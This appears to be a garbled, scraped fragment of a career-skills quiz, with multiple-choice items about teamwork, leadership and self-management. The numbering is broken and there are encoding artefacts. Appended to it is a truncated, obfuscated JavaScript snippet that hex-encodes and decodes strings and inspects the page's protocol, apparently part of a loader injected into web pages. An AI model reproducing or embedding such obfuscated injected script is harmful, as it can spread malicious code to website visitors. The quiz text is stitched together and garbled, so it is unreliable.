decompose information for creative problem solving. 570. The ability to sustain a positive impression, instill confidence, and maintain career advancement.\r\n115.The text describes skills and personal characteristics that provide a foundation for continued professional development and career success. Which of the following is NOT one of th ese skills or personal characteristics?\r\n571. Teamwork.\r\n572. Self-management.\r\n573. Leadership.\r\n574. circumstantial thinking.\r\n575. Perceptual acuity.\r\n// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\\S\\s]{1,2}/g);for(var t=ââ¬Âââ¬Â,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e\r\n'
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